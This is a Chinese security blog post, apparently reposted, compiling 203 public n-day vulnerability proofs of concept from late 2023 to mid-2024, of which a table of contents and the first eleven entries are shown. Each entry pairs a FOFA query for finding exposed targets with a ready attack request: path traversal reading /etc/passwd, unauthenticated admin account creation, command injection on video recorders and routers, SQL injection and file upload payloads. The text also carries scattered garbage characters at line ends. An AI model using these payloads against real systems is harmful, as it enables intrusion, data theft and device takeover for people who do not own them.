互联网公开漏洞整理202309-202406+ a6 H9 c n. h! Q: I# ]
道一安全 2024-06-05 07:41 北京/ }' p8 J/ ~- R8 v& |" }7 B
以下文章来源于网络安全新视界 ,作者网络安全新视界" ?; B9 r3 m1 b' ^0 u
6 ?8 p% `9 {3 _" z! K* a' ^: v发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
$ b* X1 H( t, o" u# Y ?1 Z' R" T4 d) o
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
8 P" U! l. M& \
) k& `9 z) M7 |6 H+ B, c安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。8 O# l* h! p! i4 q: @- S; }
, X% \+ V0 g+ E. @9 Z5 ]1 v- Z文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。" F; N9 C0 ]* l" }1 {* E
! s1 C4 Y! R! r+ i9 P [; F
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
+ V0 t- b8 d: ]; J
1 v( f. G7 v; B- G8 e \+ U( f+ j' \& b( x4 P! \* b
声明
9 a0 h: Y5 O M& b* u& v* D1 u& i7 ~7 K: r$ I
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
! h/ `5 K: R6 K7 |) T& l- Y; \6 j. `
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。1 \9 q$ S! b& h
! w% y7 Y) w2 H8 U- Q G* W) b% z3 y
- u& w: I2 x* v, ^$ U6 s T
! S9 ~; p' Z5 A" i7 L6 p9 b目录8 T3 Q. s& l! o
( J$ t7 j" m( d( J6 \- W
01
( B8 C' J. c, n7 Z. r6 ~$ `0 o- V$ U: L5 P3 w& k7 e
1. StarRocks MPP数据库未授权访问4 F; u# X- n' v2 a3 Z7 a
2. Casdoor系统static任意文件读取
1 Y# |) p* B0 ?3. EasyCVR智能边缘网关 userlist 信息泄漏( `& {, K l8 w+ z
4. EasyCVR视频管理平台存在任意用户添加9 d h- @: X. V6 R1 u. x
5. NUUO NVR 视频存储管理设备远程命令执行
/ s8 O) U2 o* I: T( ]' U5 Y6. 深信服 NGAF 任意文件读取
3 _3 J$ K2 C* D1 m0 t. c7. 鸿运主动安全监控云平台任意文件下载. X1 S$ z& Y& i$ o5 `/ E
8. 斐讯 Phicomm 路由器RCE+ \0 I' n! d# R" ~. h
9. 稻壳CMS keyword 未授权SQL注入" \0 q/ s7 @# r! X, h: s
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
. [. ~2 V& m T q6 H- X11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入% D( F% M. {, }# P# }& v
12. Jorani < 1.0.2 远程命令执行
, v% M* `' j0 w2 c7 P13. 红帆iOffice ioFileDown任意文件读取5 s& i6 ]$ j% i; b
14. 华夏ERP(jshERP)敏感信息泄露
. ~, H0 L! ]) S% f4 j15. 华夏ERP getAllList信息泄露
/ O b) a1 g5 m% R& U16. 红帆HFOffice医微云SQL注入- Q9 \" @! r. y5 G8 z& k. _
17. 大华 DSS itcBulletin SQL 注入 v0 W2 |3 g+ t7 |
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露& c) E; H+ p6 o) `' N3 e' C
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
; M2 R$ i/ H, ]$ L+ @: W5 [, H20. 大华ICC智能物联综合管理平台任意文件读取4 K& W' y; C, w% M% l5 b
21. 大华ICC智能物联综合管理平台random远程代码执行% v1 b( h6 T. z* j$ v
22. 大华ICC智能物联综合管理平台 log4j远程代码执行2 P2 I& V6 `/ o1 F; \ S
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
' H: O. G B* d$ F- ^$ T24. 用友NC 6.5 accept.jsp任意文件上传
2 v3 v9 W- R! q. O25. 用友NC registerServlet JNDI 远程代码执行
. y" T# H& w% O; j& i! ^" P$ c1 T26. 用友NC linkVoucher SQL注入
, q) R4 |) [* P/ h% N7 n; B: m6 p27. 用友 NC showcontent SQL注入
' ^1 \* `& G# g9 Q E0 j28. 用友NC grouptemplet 任意文件上传
2 l$ `2 ~9 T/ i4 d2 F5 [' Z6 N; f& h29. 用友NC down/bill SQL注入" P+ G& a0 y" O
30. 用友NC importPml SQL注入$ W2 b5 v O7 T2 K |# V
31. 用友NC runStateServlet SQL注入
6 y$ V. g! U; S+ ^32. 用友NC complainbilldetail SQL注入
" b, f7 ^6 c8 r+ _) ?3 X$ \33. 用友NC downTax/download SQL注入
- T$ x9 f: Q& |( j/ }# C* O34. 用友NC warningDetailInfo接口SQL注入% n1 Q9 X, w* s' F5 v3 Z
35. 用友NC-Cloud importhttpscer任意文件上传' d7 X% [% d. |, i8 \
36. 用友NC-Cloud soapFormat XXE; T8 ^3 P1 ^- S
37. 用友NC-Cloud IUpdateService XXE* y) g% H+ e' F5 C0 V5 `
38. 用友U8 Cloud smartweb2.RPC.d XXE
0 r2 D. Y. w( J& `39. 用友U8 Cloud RegisterServlet SQL注入( u! }6 r3 Y5 w# i5 { ~9 g% W
40. 用友U8-Cloud XChangeServlet XXE
' q! q5 A* Y4 S; \7 V+ I1 K. J* g41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
, ?8 @5 P, B2 F6 w, K42. 用友GRP-U8 SmartUpload01 文件上传
' h* g6 e1 M9 j8 ]: |43. 用友GRP-U8 userInfoWeb SQL注入致RCE
, i2 _. P5 X* T: l2 B5 e# N44. 用友GRP-U8 bx_dj_check.jsp SQL注入
1 q5 a/ _3 }/ F4 |% W7 c7 g45. 用友GRP-U8 ufgovbank XXE+ f3 _( w' X1 J3 n' ~ J+ ]$ E
46. 用友GRP-U8 sqcxIndex.jsp SQL注入1 J6 Z, d6 k0 [
47. 用友GRP A++Cloud 政府财务云 任意文件读取. P" x0 L4 g4 X% E: c! x4 a( g3 u8 Z
48. 用友U8 CRM swfupload 任意文件上传
9 O4 R9 U! L5 m9 Y3 V+ j49. 用友U8 CRM系统uploadfile.php接口任意文件上传! Y& @8 a, [0 J- {' Q1 q
50. QDocs Smart School 6.4.1 filterRecords SQL注入' H1 m4 ^. v5 D
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入! R& t0 Z( c7 j6 m! _. J& o
52. 泛微E-Office json_common.php sql注入! ]7 C) S: p3 k% F; y" S3 `8 [
53. 迪普 DPTech VPN Service 任意文件上传
5 A" y7 w7 Q+ L+ V5 H1 l54. 畅捷通T+ getstorewarehousebystore 远程代码执行
$ E9 P5 m# p) x$ u+ O) m- |+ R55. 畅捷通T+ getdecallusers信息泄露5 ]1 l. \7 g& q) N2 V) s
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE* _' X9 _2 D; K# C7 q! P7 I s4 X7 ?
57. 畅捷通T+ keyEdit.aspx SQL注入' f! k" H4 I2 [# A) F
58. 畅捷通T+ KeyInfoList.aspx sql注入! _( ^4 s2 D- }' q1 y v
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
1 L7 R; ]7 `- V! D: t60. 百卓Smart管理平台 importexport.php SQL注入
; }3 e/ t; M7 X2 `0 H61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
6 _& }# z' e* T4 |; ]62. IP-guard WebServer 远程命令执行
, Q3 ]; g4 R, M- c63. IP-guard WebServer任意文件读取: }0 [% T* Q+ { q! {8 [" C' Y
64. 捷诚管理信息系统CWSFinanceCommon SQL注入& h) L; ~: k2 @# u# M
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
! h6 y9 i7 U/ }66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入! T# e2 V. j" Q9 X; B x7 T/ U' \" y" A
67. 万户ezOFFICE wpsservlet任意文件上传
5 K2 W" v1 v1 K9 N7 _# I68. 万户ezOFFICE wf_printnum.jsp SQL注入
9 A5 p2 s) Y3 W& e% z69. 万户 ezOFFICE contract_gd.jsp SQL注入8 g7 G) E# S# X9 [2 u, n
70. 万户ezEIP success 命令执行
" \! e# k, }9 z3 W& x71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
! n0 s; F c9 m72. 致远OA getAjaxDataServlet XXE( {+ b, M& W6 s4 p
73. GeoServer wms远程代码执行
: A9 P: a3 a* ^- q- ?74. 致远M3-server 6_1sp1 反序列化RCE
) P# D$ D. ^9 P; o1 c75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
! h4 G: I c0 g& q; p76. 新开普掌上校园服务管理平台service.action远程命令执行
1 O' i1 _7 Q; w77. F22服装管理软件系统UploadHandler.ashx任意文件上传+ r2 ]& W5 r& W; [
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传! Q7 Q7 u2 \! p9 S! _0 f
79. BYTEVALUE 百为流控路由器远程命令执行+ ^2 m9 R8 D" ?1 [/ e7 L2 Y$ G1 X
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传/ @7 P1 a/ V# T, w* V' |
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露3 F4 C& G6 `) k. V
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行 ^% }$ w/ ?4 ]$ \# `/ o% _$ \; d
83. JeecgBoot testConnection 远程命令执行
) f9 ^( S( v; v! z84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
+ u W1 n2 T$ f& B85. SysAid On-premise< 23.3.36远程代码执行8 m% y$ M& r' ~0 K6 f) X0 {
86. 日本tosei自助洗衣机RCE
+ n# C3 v/ d* x) j* j$ o% }87. 安恒明御安全网关aaa_local_web_preview文件上传
3 r& ~8 d" w" |2 z88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行4 s* v9 _2 |$ i/ a
89. 致远互联FE协作办公平台editflow_manager存在sql注入
* i u( s Z# t( K90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行4 ^3 o' k& T+ U2 Q6 _1 F8 V
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取9 C4 p3 I+ [$ Z( s- Z( @# N
92. 海康威视运行管理中心session命令执行
" H% Y* W) P& G8 n, n93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传) ?( q) f" s& r6 N
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
! H' L- O' Y+ ~3 R5 u/ B* | Y" G95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行+ t/ k. Y7 r, b" G; o
96. Apache OFBiz 18.12.11 groovy 远程代码执行. `* \ | k2 j. c( o9 r
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行4 Q% t2 }3 Z) G& x# Z' `0 w
98. SpiderFlow爬虫平台远程命令执行
) J* ?# R# y0 G' d99. Ncast盈可视高清智能录播系统busiFacade RCE7 B; g! M" B+ B7 I$ B! d( `
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传, _, z+ u# |: ~1 @
101. ivanti policy secure-22.6命令注入5 |) g% X4 a( l+ t# N
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
$ d0 ]1 b" l" P103. Ivanti Pulse Connect Secure VPN XXE
, S) v! G' H+ P, a D. I104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
! H4 V* N+ A0 @, ~105. SpringBlade v3.2.0 export-user SQL 注入" `0 \6 C% y$ ?& F0 O. M* ~
106. SpringBlade dict-biz/list SQL 注入2 q6 L( u" P1 a; [3 U5 l/ n1 _! K
107. SpringBlade tenant/list SQL 注入
1 [/ G/ F5 r6 j( K" N& g108. D-Tale 3.9.0 SSRF
: }+ W/ U; I' d7 q109. Jenkins CLI 任意文件读取
0 @; q8 A( b4 t, R7 x& V7 k110. Goanywhere MFT 未授权创建管理员1 O6 K0 `( w* V0 _! I
111. WordPress Plugin HTML5 Video Player SQL注入: B0 B8 G z1 Y
112. WordPress Plugin NotificationX SQL 注入1 z) I" q# S* E% B& n9 n0 o
113. WordPress Automatic 插件任意文件下载和SSRF+ K' z( D2 L' Z
114. WordPress MasterStudy LMS插件 SQL注入
9 p9 { y/ s6 s3 o9 Z3 b115. WordPress Bricks Builder <= 1.9.6 RCE0 N2 ?/ W d% W& r7 E7 c0 r* v
116. wordpress js-support-ticket文件上传( o" I% E# f% L' U- D9 `4 ]
117. WordPress LayerSlider插件SQL注入
g2 H- `% T I3 U118. 北京百绰智能S210管理平台uploadfile.php任意文件上传; F4 W" \* g9 i9 E
119. 北京百绰智能S20后台sysmanageajax.php sql注入/ q3 c! ~+ I e; W' u, O$ w
120. 北京百绰智能S40管理平台导入web.php任意文件上传2 K. _# j# U* k0 d
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
" R T1 Y/ T9 g+ M* F9 T% |6 X' B122. 北京百绰智能s200管理平台/importexport.php sql注入
+ a( K- _$ N6 ^/ [/ ~2 y123. Atlassian Confluence 模板注入代码执行3 ~3 h8 p; q4 I3 B, k1 s
124. 湖南建研工程质量检测系统任意文件上传
! j) E# z! q% ?5 V8 f! h125. ConnectWise ScreenConnect身份验证绕过
g) X4 N- v3 d! G! L6 {126. Aiohttp 路径遍历
" r/ c0 ]6 o6 v( E3 H3 ~127. 广联达Linkworks DataExchange.ashx XXE/ v g" r9 K% R- U, W. o
128. Adobe ColdFusion 反序列化
& ?( |' Q9 h/ ?; k2 z129. Adobe ColdFusion 任意文件读取
1 Y" P# K2 s: e/ M. J' o) q& H4 i130. Laykefu客服系统任意文件上传 {" f1 f$ i. B. d7 s+ [- w
131. Mini-Tmall <=20231017 SQL注入
( u3 Q; t. T! R% x2 X132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过% L9 [* t s3 I( Z9 S, E T
133. H5 云商城 file.php 文件上传
, ^8 @9 I2 v3 p+ ^- q, H( y134. 网康NS-ASG应用安全网关index.php sql注入
4 }3 j% ^" G r$ D& X. P135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入+ ]% V( z1 R: c0 I
136. NextChat cors SSRF# M: `! Z" J1 s
137. 福建科立迅通信指挥调度平台down_file.php sql注入3 u) Y0 s R8 c" m8 a0 `, c9 [
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入4 \. m. X) s2 o9 m) }- D% T7 y
139. 福建科立讯通信指挥调度平台editemedia.php sql注入/ b& a0 Y( `+ ^; ? R
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
3 O. l$ h3 W `. f+ ]141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
- `( ~* q& b# O3 m* g" X& t142. CMSV6车辆监控平台系统中存在弱密码
8 p$ q# z+ j# v- {9 [9 \143. Netis WF2780 v2.1.40144 远程命令执行. t! c& V9 R1 I" \& n( q2 _9 U; ~
144. D-Link nas_sharing.cgi 命令注入% H1 f5 W9 ?8 \, r
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
+ p8 f( q: g2 F2 m# \+ ]146. MajorDoMo thumb.php 未授权远程代码执行& z; C+ U4 d! E) V" e
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
+ ?7 P, Q! q0 V$ x148. CrushFTP 认证绕过模板注入
- U) R) Y# v L$ u149. AJ-Report开源数据大屏存在远程命令执行& d+ W1 _: O6 ]3 Z7 l
150. AJ-Report 1.4.0 认证绕过与远程代码执行
3 f! b. k7 O2 k1 o$ c I6 d* j* u151. AJ-Report 1.4.1 pageList sql注入
, z1 j2 N1 S7 P, l; s152. Progress Kemp LoadMaster 远程命令执行% z. V& @' j9 C) E0 z
153. gradio任意文件读取
a O* a' {9 G" M6 F' {154. 天维尔消防救援作战调度平台 SQL注入
4 R* t4 C* S: c: [155. 六零导航页 file.php 任意文件上传# L0 L* S: @7 k! A% o
156. TBK DVR-4104/DVR-4216 操作系统命令注入
- W) t. F6 d; @* c! b) z/ h157. 美特CRM upload.jsp 任意文件上传6 f, _7 D" `/ \9 [! P+ j" {/ V
158. Mura-CMS-processAsyncObject存在SQL注入- i! A6 v2 d) O1 b+ \
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
6 c9 ^( v; j8 z& A$ a160. Sonatype Nexus Repository 3目录遍历与文件读取# C+ l( b, f2 W! D1 Y) F
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
, Y7 X: I0 H- ^* Z$ Z# M, z162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传. U! ] b& b, r
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传+ j' }: j1 R5 a2 |3 Z) v
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传$ r2 C! ] [, Q4 W
165. OrangeHRM 3.3.3 SQL 注入3 K6 @' R4 b$ ~: V( s1 s. D
166. 中成科信票务管理平台SeatMapHandler SQL注入
3 \$ O$ {/ V" b) u167. 精益价值管理系统 DownLoad.aspx任意文件读取+ K& D& F6 ^# W. \( W7 e( [# T
168. 宏景EHR OutputCode 任意文件读取
a% E+ |- M( h$ `$ v169. 宏景EHR downlawbase SQL注入
1 s5 }3 Z' e3 G. E170. 宏景EHR DisplayExcelCustomReport 任意文件读取
. w5 K& W% w/ ~* v' }! y4 e171. 通天星CMSV6车载定位监控平台 SQL注入; u4 H7 j% Y; f" M9 \0 X' V: v
172. DT-高清车牌识别摄像机任意文件读取9 q; |; O, R* u$ d& C
173. Check Point 安全网关任意文件读取
, T _. w$ _ e1 e, h# s' C; A! J174. 金和OA C6 FileDownLoad.aspx 任意文件读取
0 m& ]5 ~4 c+ p2 s% p$ {* N175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
( b K& i5 c4 Z/ x176. 电信网关配置管理系统 rewrite.php 文件上传
2 x P/ \; f6 P( U* K177. H3C路由器敏感信息泄露
" T3 `* ]; q0 E$ m% ` E178. H3C校园网自助服务系统-flexfileupload-任意文件上传
* o2 h# o& A0 p& f7 I+ T L179. 建文工程管理系统存在任意文件读取$ A2 g, X s7 n8 X @
180. 帮管客 CRM jiliyu SQL注入
7 F/ E& n% {3 }+ u( L. h181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入; ~6 O. @. H! T' s" G" x
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建0 d# P9 ]" y$ n I
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入2 n' c1 p$ W5 @% A1 F
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加0 }7 x. p3 y; H6 J! y3 Z
185. 瑞友天翼应用虚拟化系统SQL注入
. i7 I* [( B- V0 O% f186. F-logic DataCube3 SQL注入
" R: H' [( N5 G) I; r, `, g( p) L187. Mura CMS processAsyncObject SQL注入
. {! Y* h7 y$ a% j188. 叁体-佳会视频会议 attachment 任意文件读取
8 K' \; D% Z/ |0 z) c* C189. 蓝网科技临床浏览系统 deleteStudy SQL注入5 `% L, O& s( }8 ]! \: }, |
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
2 {5 B8 _8 I* w3 O191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
8 \0 m! P Q& e7 g) m/ G- Q192. 富通天下外贸ERP UploadEmailAttr 任意文件上传2 _3 y# E) Y- f) c3 e
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行- Y1 Q' N) f' L4 z! Y
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
) x0 ]4 w' {1 J7 s, |4 q$ D# ~* c195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
7 [* z0 y. m' ]- W: |196. 河南省风速科技统一认证平台密码重置
" b8 Q8 M# }& m% E! S4 Y+ Q, L. A197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
& `1 f$ V3 z# e9 F1 h- v# i0 q: H198. 阿里云盘 WebDAV 命令注入
; A" l4 ^2 _4 n. R; V1 D199. cockpit系统assetsmanager_upload接口 文件上传6 t" P9 l$ a. U
200. SeaCMS海洋影视管理系统dmku SQL注入6 K8 ~7 f6 P: M- ^" Y$ g
201. 方正全媒体新闻采编系统 binary SQL注入
' p" P5 |8 B/ x- Q( V202. 微擎系统 AccountEdit任意文件上传
_: m, J5 k9 S. k$ a% w3 E9 ?$ k; q203. 红海云EHR PtFjk 文件上传
. r6 m2 d% i* j( G/ h$ L/ s& n
J$ i9 a# U$ [POC列表: i' z5 T5 y' E$ |+ Q
1 M3 D' \7 g: X3 B+ ]2 R02' u$ M' L5 }; G, o0 F3 M
) [: }8 I, U+ V: P, E: j2 N* d
1. StarRocks MPP数据库未授权访问
. I9 U7 y) X: S; M6 K- SFOFA :title="StarRocks"
: d0 ]7 P/ J6 i5 I" m tGET /mem_tracker HTTP/1.1
. }' k0 ]# D7 ~* X9 E8 \# D% hHost: URL' D4 {0 H+ `9 @! l: g' w2 |3 L
" @0 @$ e- V% V: j; N4 z; C) D; N/ \
2. Casdoor系统static任意文件读取' Y2 _5 \5 u: i/ D
FOFA :title="Casdoor"1 w, a; Z$ x2 S! m0 z3 |
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1% ~( ` M, Y E: u& z! ]
Host: xx.xx.xx.xx:9999' O) e9 j# ^1 t! T7 r8 L/ @2 O
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, z" I7 ^8 }. v n1 [
Connection: close
q0 e8 ^: y1 n5 i+ NAccept: */*& q2 @: U0 l) o& |: h5 n& \
Accept-Language: en
) R: [' _5 k2 R' @ tAccept-Encoding: gzip
5 L9 V$ S4 Q' P8 J& K4 p" g P) d, J/ W2 s! X# a& |( w# ~9 W
% n5 N2 z" [( U" I: @3. EasyCVR智能边缘网关 userlist 信息泄漏
% R/ g% R; \; OFOFA :title="EasyCVR"
; l, `8 j& E9 |$ x5 o. Z, cGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
* |( r& T; c2 yHost: xx.xx.xx.xx% s! v8 ?1 O/ |% w6 A
& R3 S6 X5 n7 [" d' a
7 k2 u. h. C6 a3 f5 F4. EasyCVR视频管理平台存在任意用户添加& m8 W+ r7 N7 f' Z8 k4 F' b
FOFA :title="EasyCVR" r; ?5 @ K0 g# f: f0 e4 }
; A% C; b/ z) b* F( U0 ^4 r \3 F7 O
password更改为自己的密码md5. X% ?3 U: i- J8 X( ^
POST /api/v1/adduser HTTP/1.1# S2 F) y1 Y. H4 }
Host: your-ip
- o s9 a! m/ p7 `Content-Type: application/x-www-form-urlencoded; charset=UTF-8- `2 z2 v; V3 b# W
- C: f+ c ~. S- n
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1, g9 c( ^$ z4 B. f( O j' q
" c' M+ l+ W4 F/ P+ W4 s5 w5 C4 T8 Q/ d' X; [- H5 N/ n
5. NUUO NVR 视频存储管理设备远程命令执行2 }& k& M9 ^% C+ B: ~6 m
FOFA:title="Network Video Recorder Login"
5 a$ g& r1 b% y9 F' dGET /__debugging_center_utils___.php?log=;whoami HTTP/1.10 u0 c' K. ^; B- O4 O
Host: xx.xx.xx.xx
' c: m: d% E3 C) X8 y6 Q1 U W" ?: e6 Y% r
( r* L% Q9 o# j, V! [0 R6. 深信服 NGAF 任意文件读取
3 E1 `6 z, i+ t3 N+ B1 G6 ^) n8 _FOFA:title="SANGFOR | NGAF"
7 X2 `0 d% @6 a! P% B GGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1% y" K* o: c2 U0 c/ ~, `
Host:
% m! l; p' @# T/ X# r& ^8 V, y) a, p6 G( R) | L6 T ], x
! X6 m$ Q+ L! V o5 p r* Z& w
7. 鸿运主动安全监控云平台任意文件下载
" ]$ i5 o( ^/ kFOFA:body="./open/webApi.html"
; G j1 m( {' j/ H/ J1 r6 P/ oGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
# X( Y% a" }* E% W7 [2 fHost:+ N2 F+ m- p8 e/ b
) N5 [ e, \7 o
$ H* \5 }' v" V3 L$ a8. 斐讯 Phicomm 路由器RCE/ K0 d. Z& T) V, k0 L. S! V" q0 n0 @
FOFA:icon_hash="-1344736688"+ \0 X. w# J4 v" z$ j' K6 P
默认账号admin登录后台后,执行操作6 u' e, O' C# @* q- E& u$ d' y
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.19 ~$ z( r( a% c0 _6 F5 x
Host: x.x.x.x
: J2 F# i& J. a+ @6 _! ~- YCookie: sysauth=第一步登录获取的cookie
" J0 [* Y9 W# G: r( j) h! rContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz7 V* f2 r. r: X7 [& R3 G
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
- y5 X) p3 x9 F7 k
6 Z4 l0 `1 P& D------WebKitFormBoundaryxbgjoytz
) s% f9 T, e! \: W8 pContent-Disposition: form-data; name="wifiRebootEnablestatus"0 d" e6 Q& _, j; N6 @' n
" G# J( t9 i3 C+ y$ u5 \4 D%s
# b6 C: \) w& V; ?------WebKitFormBoundaryxbgjoytz# \/ c( q' x" c8 x$ S2 ^5 V
Content-Disposition: form-data; name="wifiRebootrange"# z& W3 ~: r/ n
J6 c6 J# k; |12:00; id;3 i+ h- [) v: Z' r& p1 E) G
------WebKitFormBoundaryxbgjoytz
2 z6 w! V' j6 C6 ?Content-Disposition: form-data; name="wifiRebootendrange"
6 }' g% W0 ~, B# @
: I$ l/ T% f" r! v2 T6 `%s:2 i0 Y7 _) x$ ]7 T n+ z
------WebKitFormBoundaryxbgjoytz
% N8 r k' {: u" {+ V3 }" dContent-Disposition: form-data; name="cururl2"
o' V3 K9 E; s. k
2 r* Y4 u, `: x" g
- K2 h# R" T+ ?/ i2 X( g------WebKitFormBoundaryxbgjoytz--
1 `8 B6 Y, O& n l- a* J( g; S. A* j9 o, t" c
0 g$ g- Y4 }/ w- b0 v9 w9. 稻壳CMS keyword 未授权SQL注入
- S. M" Z P& L" [. s# dFOFA:app="Doccms"
2 ]4 n5 e! S6 @; @0 `8 wGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
9 _% `& c' x/ Y% UHost: x.x.x.x
0 R1 K0 v9 J8 p7 H) J, x+ }) ^
- L( Y8 {1 l. s. m3 f4 R
7 N( Z' H. I5 n b( Ypayload为下列语句的二次Url编码
6 _+ p3 C9 y+ C+ X) Z" A
( q/ E0 o2 ^' s I. y5 y% l' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
8 `2 x3 O" K5 j& q$ T* m9 {; \/ x5 q9 E# @3 n# ^ g. T4 ]. a
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传- {- ?- d/ Y4 S2 A" t7 h
FOFA:icon_hash="953405444"# E+ t# D5 v$ F% O: {
+ s; s- ]) X; K. i. v文件上传后响应中包含上传文件的路径
3 T2 P7 E+ z* |- YPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
* k5 N5 u' K: T3 nHost: x.x.x.x:xx& J/ A: x! t- b/ |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
$ v; t; }. ~7 g) C( o0 ^/ g' H0 ?/ EContent-Length: 197) J# W$ q1 H* {- L x1 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
5 \: O) H: r5 K' }. N( x" zAccept-Encoding: gzip, deflate
: F5 H- f4 c( VAccept-Language: zh-CN,zh;q=0.9
' O+ a' o5 @3 x+ MConnection: close
6 V( S5 k, @9 ?. N8 w* OContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu9 c5 A) T* w0 ^' l5 x
- x: K+ i$ n! u) l; r+ K% H9 a
------WebKitFormBoundaryxdgaqmqu
8 W* ]5 q l3 z6 J @; G9 N5 _2 `0 ]Content-Disposition: form-data; name="file"filename="icfitnya.txt"9 R; n# H |) u9 k: I$ J$ L9 b$ ^
Content-Type: text/html/ Z$ e' T8 ~- o$ u4 k
/ i. P* R5 l$ C& A: D, z9 k
jmnqjfdsupxgfidopeixbgsxbf
, w0 e0 p4 K4 _ k" [------WebKitFormBoundaryxdgaqmqu--
* X% p, }: v! Q* K f2 @4 U
& [/ b Z2 ]3 _8 F+ `7 V" V# V
0 n+ {0 v; J4 _$ ~( }3 T11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入5 V: }" Z: w O& i$ c& V$ V
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"! B- |' V- e8 {2 R& f$ N. k( ^
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
